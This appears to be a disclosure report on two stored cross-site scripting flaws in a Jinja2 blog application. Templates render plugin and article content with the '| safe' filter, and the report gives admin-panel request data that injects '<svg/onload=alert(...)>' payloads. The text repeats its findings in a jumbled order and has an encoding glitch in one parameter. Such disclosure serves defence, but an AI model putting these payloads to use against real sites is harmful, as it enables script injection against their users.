Cross-site scripting (XSS) vulnerability in /app/templates/base.html line 112 .
{{ plugin.content | safe }}
Use jinja2's safe tag to allow plugin content to be escaped and not filtered, resulting in Cross-site scripting (XSS) vulnerability
Steps To Reproduce:
After the administrator logged in.
Url :http://192.168.195.164:8080/admin/custom/blog-plugin/add
Data :csrf_token=1554792968%23%235f35bd58e994cc0ff9ee605d573442dc898ff6fc&title=plugin+xss¬e=test&content=<svg/onload=alert(1)>
back to the homepage
2.A Cross-site scripting on Add Article
Description
Cross-site scripting (XSS) vulnerability in /app/templates/article_detials.html line 14 .
{{ article.content | safe }}
Use jinja2's safe tag to allow plugin content to be escaped and not filtered, resulting in Cross-site scripting (XSS) vulnerability
Steps To Reproduce:
After the administrator logged in.
URL http://192.168.195.164:8080/admin/submit-articles
Data: csrf_token=1554793565%23%239ed010b3b0416557e2930cd0cc53c334f9f3f8ca&source=1&title=Article+xss&content=<svg/onload=alert(3)>&types=1&summary=test
1.A Cross-site scripting on Add plugin
Description
Cross-site scripting (XSS) vulnerability in /app/templates/base.html line 112 . {{ plugin.content | safe }} Use jinja2's safe tag to allow plugin content to be escaped and not filtered, resulting in Cross-site scripting (XSS) vulnerability
Steps To Reproduce:
After the administrator logged in. Url :http://192.168.195.164:8080/admin/custom/blog-plugin/add Data :csrf_token=1554792968%23%235f35bd58e994cc0ff9ee605d573442dc898ff6fc&title=plugin+xss¬e=test&content=<svg/onload=alert(1)> back to the homepage
2.A Cross-site scripting on Add Article
Description
Cross-site scripting (XSS) vulnerability in /app/templates/article_detials.html line 14 . {{ article.content | safe }} Use jinja2's safe tag to allow plugin content to be escaped and not filtered, resulting in Cross-site scripting (XSS) vulnerability
Steps To Reproduce:
After the administrator logged in. URL http://192.168.195.164:8080/admin/submit-articles Data: csrf_token=1554793565%23%239ed010b3b0416557e2930cd0cc53c334f9f3f8ca&source=1&title=Article+xss&content=<svg/onload=alert(3)>&types=1&summary=test
back to the homepage and Click on article ,this will trigger xss http://192.168.195.164:8080/article-detials/2